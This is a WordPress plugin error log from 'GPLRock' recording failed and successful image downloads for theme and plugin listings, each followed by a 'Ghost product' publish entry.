[06-Apr-2026 08:59:32 UTC] GPLRock: Image download failed for product persona-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:32 UTC] GPLRock: Image download failed for product alex-stone-gym-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:34 UTC] GPLRock: Image download failed for product persona-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:34 UTC] GPLRock: Image download failed for product alex-stone-gym-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/persona---portfolio-wordpress-theme-8108.webp for product persona-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:36 UTC] GPLRock WARNING: Image download failed for product persona-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/persona---portfolio-wordpress-theme-8108.webp [06-Apr-2026 08:59:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: persona-portfolio-wordpress-theme [06-Apr-2026 08:59:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alex-stone--gym--coach-wordpress-theme-20265.webp for product alex-stone-gym-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:36 UTC] GPLRock WARNING: Image download failed for product alex-stone-gym-coach-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alex-stone--gym--coach-wordpress-theme-20265.webp [06-Apr-2026 08:59:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alex-stone-gym-coach-wordpress-theme [06-Apr-2026 08:59:36 UTC] GPLRock: Image downloaded successfully for product proguards-safety-body-guard-security-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f1f678e.webp [06-Apr-2026 08:59:36 UTC] GPLRock: Using pre-downloaded image for product proguards-safety-body-guard-security-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f1f678e.webp [06-Apr-2026 08:59:36 UTC] GPLRock: Ghost product published with image - Product ID: proguards-safety-body-guard-security-wordpress-theme [06-Apr-2026 08:59:36 UTC] GPLRock: Image download failed for product healingy-therapy-counseling-psychologist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:36 UTC] GPLRock: Image download failed for product boosin-book-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:38 UTC] GPLRock: Image download failed for product healingy-therapy-counseling-psychologist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:38 UTC] GPLRock: Image download failed for product boosin-book-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healingy---therapy--counseling-psychologist-wordpress-theme-6510.webp for product healingy-therapy-counseling-psychologist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boosin--book-store-wordpress-theme-25089.webp for product boosin-book-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:40 UTC] GPLRock: Image download failed for product healingy-therapy-counseling-psychologist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:41 UTC] GPLRock: Image download failed for product boosin-book-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:43 UTC] GPLRock: Image download failed for product healingy-therapy-counseling-psychologist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:43 UTC] GPLRock: Image download failed for product boosin-book-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healingy---therapy--counseling-psychologist-wordpress-theme-6510.webp for product healingy-therapy-counseling-psychologist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:45 UTC] GPLRock WARNING: Image download failed for product healingy-therapy-counseling-psychologist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/healingy---therapy--counseling-psychologist-wordpress-theme-6510.webp [06-Apr-2026 08:59:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: healingy-therapy-counseling-psychologist-wordpress-theme [06-Apr-2026 08:59:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boosin--book-store-wordpress-theme-25089.webp for product boosin-book-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:45 UTC] GPLRock WARNING: Image download failed for product boosin-book-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/boosin--book-store-wordpress-theme-25089.webp [06-Apr-2026 08:59:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boosin-book-store-wordpress-theme [06-Apr-2026 08:59:45 UTC] GPLRock: Image download failed for product sash-bootstrap-5-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:45 UTC] GPLRock: Image download failed for product gowash-dry-cleaning-laundry-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:47 UTC] GPLRock: Image download failed for product gowash-dry-cleaning-laundry-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:47 UTC] GPLRock: Image download failed for product sash-bootstrap-5-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sash---bootstrap-5-admin--dashboard-template-23535.webp for product sash-bootstrap-5-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gowash--dry-cleaning--laundry-service-wordpress-theme-6172.webp for product gowash-dry-cleaning-laundry-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:49 UTC] GPLRock: Image download failed for product gowash-dry-cleaning-laundry-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:49 UTC] GPLRock: Image download failed for product sash-bootstrap-5-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:51 UTC] GPLRock: Image download failed for product sash-bootstrap-5-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:51 UTC] GPLRock: Image download failed for product gowash-dry-cleaning-laundry-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sash---bootstrap-5-admin--dashboard-template-23535.webp for product sash-bootstrap-5-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:53 UTC] GPLRock WARNING: Image download failed for product sash-bootstrap-5-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/sash---bootstrap-5-admin--dashboard-template-23535.webp [06-Apr-2026 08:59:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sash-bootstrap-5-admin-dashboard-template [06-Apr-2026 08:59:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gowash--dry-cleaning--laundry-service-wordpress-theme-6172.webp for product gowash-dry-cleaning-laundry-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:53 UTC] GPLRock WARNING: Image download failed for product gowash-dry-cleaning-laundry-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gowash--dry-cleaning--laundry-service-wordpress-theme-6172.webp [06-Apr-2026 08:59:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gowash-dry-cleaning-laundry-service-wordpress-theme [06-Apr-2026 09:01:02 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:04 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostlinea---web-hosting-responsive-wp-theme-31387.webp for product hostlinea-web-hosting-responsive-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:06 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:08 UTC] GPLRock: Image download failed for product hostlinea-web-hosting-responsive-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostlinea---web-hosting-responsive-wp-theme-31387.webp for product hostlinea-web-hosting-responsive-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:10 UTC] GPLRock WARNING: Image download failed for product hostlinea-web-hosting-responsive-wp-theme. URL: https://meldwp.com/wp-content/uploads/hostlinea---web-hosting-responsive-wp-theme-31387.webp [06-Apr-2026 09:01:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hostlinea-web-hosting-responsive-wp-theme [06-Apr-2026 09:01:10 UTC] GPLRock: Image download failed for product immigway-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:13 UTC] GPLRock: Image download failed for product immigway-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/immigway---immigration-and-visa-consulting-wordpress-theme-22067.webp for product immigway-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:15 UTC] GPLRock: Image download failed for product immigway-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:17 UTC] GPLRock: Image download failed for product immigway-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/immigway---immigration-and-visa-consulting-wordpress-theme-22067.webp for product immigway-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:19 UTC] GPLRock WARNING: Image download failed for product immigway-immigration-and-visa-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/immigway---immigration-and-visa-consulting-wordpress-theme-22067.webp [06-Apr-2026 09:01:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: immigway-immigration-and-visa-consulting-wordpress-theme [06-Apr-2026 09:01:19 UTC] GPLRock: Image download failed for product cleener-cleaning-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:21 UTC] GPLRock: Image download failed for product cleener-cleaning-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleener---cleaning-services-wordpress-theme-5338.webp for product cleener-cleaning-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:23 UTC] GPLRock: Image download failed for product cleener-cleaning-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:25 UTC] GPLRock: Image download failed for product cleener-cleaning-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleener---cleaning-services-wordpress-theme-5338.webp for product cleener-cleaning-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:28 UTC] GPLRock WARNING: Image download failed for product cleener-cleaning-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cleener---cleaning-services-wordpress-theme-5338.webp [06-Apr-2026 09:01:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cleener-cleaning-services-wordpress-theme [06-Apr-2026 09:01:28 UTC] GPLRock: Image download failed for product lumilux-jewelry-and-accessories-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:30 UTC] GPLRock: Image download failed for product lumilux-jewelry-and-accessories-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumilux---jewelry-and-accessories-woocommerce-theme-12025.webp for product lumilux-jewelry-and-accessories-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:32 UTC] GPLRock: Image download failed for product lumilux-jewelry-and-accessories-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:34 UTC] GPLRock: Image download failed for product lumilux-jewelry-and-accessories-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumilux---jewelry-and-accessories-woocommerce-theme-12025.webp for product lumilux-jewelry-and-accessories-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:36 UTC] GPLRock WARNING: Image download failed for product lumilux-jewelry-and-accessories-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/lumilux---jewelry-and-accessories-woocommerce-theme-12025.webp [06-Apr-2026 09:01:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lumilux-jewelry-and-accessories-woocommerce-theme [06-Apr-2026 09:01:36 UTC] GPLRock: Image download failed for product gainlove-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:39 UTC] GPLRock: Image download failed for product gainlove-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gainlove---nonprofit-charity-wordpress-theme-12455.webp for product gainlove-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:41 UTC] GPLRock: Image download failed for product gainlove-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:43 UTC] GPLRock: Image download failed for product gainlove-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gainlove---nonprofit-charity-wordpress-theme-12455.webp for product gainlove-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:45 UTC] GPLRock WARNING: Image download failed for product gainlove-nonprofit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gainlove---nonprofit-charity-wordpress-theme-12455.webp [06-Apr-2026 09:01:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gainlove-nonprofit-charity-wordpress-theme [06-Apr-2026 09:01:45 UTC] GPLRock: Image download failed for product flexiblog-react-gatsby-multipurpose-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:47 UTC] GPLRock: Image download failed for product flexiblog-react-gatsby-multipurpose-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexiblog---react-gatsby-multipurpose-blog-theme-7484.webp for product flexiblog-react-gatsby-multipurpose-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:49 UTC] GPLRock: Image download failed for product flexiblog-react-gatsby-multipurpose-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:51 UTC] GPLRock: Image download failed for product flexiblog-react-gatsby-multipurpose-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexiblog---react-gatsby-multipurpose-blog-theme-7484.webp for product flexiblog-react-gatsby-multipurpose-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:54 UTC] GPLRock WARNING: Image download failed for product flexiblog-react-gatsby-multipurpose-blog-theme. URL: https://meldwp.com/wp-content/uploads/flexiblog---react-gatsby-multipurpose-blog-theme-7484.webp [06-Apr-2026 09:01:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flexiblog-react-gatsby-multipurpose-blog-theme [06-Apr-2026 09:01:54 UTC] GPLRock: Image download failed for product muzex-museum-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:56 UTC] GPLRock: Image download failed for product muzex-museum-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:01:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muzex---museum-wordpress-theme--rtl-27698.webp for product muzex-museum-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:01:58 UTC] GPLRock: Image download failed for product muzex-museum-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:00 UTC] GPLRock: Image download failed for product muzex-museum-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muzex---museum-wordpress-theme--rtl-27698.webp for product muzex-museum-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:02:02 UTC] GPLRock WARNING: Image download failed for product muzex-museum-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/muzex---museum-wordpress-theme--rtl-27698.webp [06-Apr-2026 09:02:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muzex-museum-wordpress-theme-rtl [06-Apr-2026 09:02:02 UTC] GPLRock: Image download failed for product knox-multi-business-modern-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:04 UTC] GPLRock: Image download failed for product knox-multi-business-modern-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knox--multi-business-modern-wordpress-theme-2038.webp for product knox-multi-business-modern-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:02:07 UTC] GPLRock: Image download failed for product knox-multi-business-modern-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:09 UTC] GPLRock: Image download failed for product knox-multi-business-modern-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knox--multi-business-modern-wordpress-theme-2038.webp for product knox-multi-business-modern-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:02:11 UTC] GPLRock WARNING: Image download failed for product knox-multi-business-modern-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/knox--multi-business-modern-wordpress-theme-2038.webp [06-Apr-2026 09:02:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: knox-multi-business-modern-wordpress-theme [06-Apr-2026 09:02:11 UTC] GPLRock: Image downloaded successfully for product benews-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c0be5a9.webp [06-Apr-2026 09:02:11 UTC] GPLRock: Using pre-downloaded image for product benews-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c0be5a9.webp [06-Apr-2026 09:02:11 UTC] GPLRock: Ghost product published with image - Product ID: benews-magazine-wordpress-theme [06-Apr-2026 09:02:11 UTC] GPLRock: Image download failed for product omnity-music-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:13 UTC] GPLRock: Image download failed for product omnity-music-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omnity---music-store-wordpress-theme-4084.webp for product omnity-music-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:02:15 UTC] GPLRock: Image download failed for product omnity-music-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:17 UTC] GPLRock: Image download failed for product omnity-music-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:02:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/omnity---music-store-wordpress-theme-4084.webp for product omnity-music-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:02:20 UTC] GPLRock WARNING: Image download failed for product omnity-music-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/omnity---music-store-wordpress-theme-4084.webp [06-Apr-2026 09:02:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: omnity-music-store-wordpress-theme [06-Apr-2026 09:03:09 UTC] GPLRock: Image downloaded successfully for product userpro-community-and-user-profile-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dde9493a.jpg [06-Apr-2026 09:03:09 UTC] GPLRock: Using pre-downloaded image for product userpro-community-and-user-profile-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dde9493a.jpg [06-Apr-2026 09:03:09 UTC] GPLRock: Ghost product published with image - Product ID: userpro-community-and-user-profile-wordpress-plugin [06-Apr-2026 09:03:12 UTC] GPLRock: Image download failed for product roneous-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 09:03:16 UTC] GPLRock: Image download failed for product roneous-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 09:03:20 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Roneous-Creative-Multi-Purpose-WordPress-Theme.jpg for product roneous-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 09:03:22 UTC] GPLRock: Image download failed for product roneous-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 09:03:26 UTC] GPLRock: Image download failed for product roneous-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 09:03:30 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Roneous-Creative-Multi-Purpose-WordPress-Theme.jpg for product roneous-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 09:03:30 UTC] GPLRock WARNING: Image download failed for product roneous-creative-multi-purpose-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/07/Roneous-Creative-Multi-Purpose-WordPress-Theme.jpg [06-Apr-2026 09:03:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: roneous-creative-multi-purpose-wordpress-theme [06-Apr-2026 09:03:32 UTC] GPLRock: Image downloaded successfully for product the-team-pro-team-showcase-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd94b14e.jpg [06-Apr-2026 09:03:32 UTC] GPLRock: Using pre-downloaded image for product the-team-pro-team-showcase-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd94b14e.jpg [06-Apr-2026 09:03:32 UTC] GPLRock: Ghost product published with image - Product ID: the-team-pro-team-showcase-wordpress-plugin [06-Apr-2026 09:03:34 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-conditional-success-redirects (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6dd641c8.jpg [06-Apr-2026 09:03:34 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-conditional-success-redirects: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6dd641c8.jpg [06-Apr-2026 09:03:34 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-conditional-success-redirects [06-Apr-2026 09:03:35 UTC] GPLRock: Image downloaded successfully for product the-ark-wordpress-theme-made-for-freelancers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1b031ad.jpg [06-Apr-2026 09:03:35 UTC] GPLRock: Using pre-downloaded image for product the-ark-wordpress-theme-made-for-freelancers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1b031ad.jpg [06-Apr-2026 09:03:35 UTC] GPLRock: Ghost product published with image - Product ID: the-ark-wordpress-theme-made-for-freelancers [06-Apr-2026 09:03:37 UTC] GPLRock: Image downloaded successfully for product eform-wordpress-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5962ded.jpg [06-Apr-2026 09:03:37 UTC] GPLRock: Using pre-downloaded image for product eform-wordpress-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5962ded.jpg [06-Apr-2026 09:03:37 UTC] GPLRock: Ghost product published with image - Product ID: eform-wordpress-form-builder [06-Apr-2026 09:03:38 UTC] GPLRock: Image downloaded successfully for product woocommerce-wishlists (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ed05e69.jpg [06-Apr-2026 09:03:38 UTC] GPLRock: Using pre-downloaded image for product woocommerce-wishlists: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ed05e69.jpg [06-Apr-2026 09:03:38 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-wishlists [06-Apr-2026 09:03:40 UTC] GPLRock: Image downloaded successfully for product woocommerce-recommendation-engine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfe3391e.jpg [06-Apr-2026 09:03:40 UTC] GPLRock: Using pre-downloaded image for product woocommerce-recommendation-engine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfe3391e.jpg [06-Apr-2026 09:03:40 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-recommendation-engine [06-Apr-2026 09:03:43 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-commissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c250afc9.jpg [06-Apr-2026 09:03:43 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-commissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c250afc9.jpg [06-Apr-2026 09:03:43 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-commissions [06-Apr-2026 09:03:44 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-advanced-sequential-order-numbers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20119b5b.jpg [06-Apr-2026 09:03:44 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-advanced-sequential-order-numbers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20119b5b.jpg [06-Apr-2026 09:03:44 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-advanced-sequential-order-numbers [06-Apr-2026 09:04:19 UTC] GPLRock: Image download failed for product autozpro-auto-parts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:21 UTC] GPLRock: Image download failed for product autozpro-auto-parts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autozpro---auto-parts-woocommerce-wordpress-theme-13145.webp for product autozpro-auto-parts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:24 UTC] GPLRock: Image download failed for product autozpro-auto-parts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:26 UTC] GPLRock: Image download failed for product autozpro-auto-parts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:28 UTC] 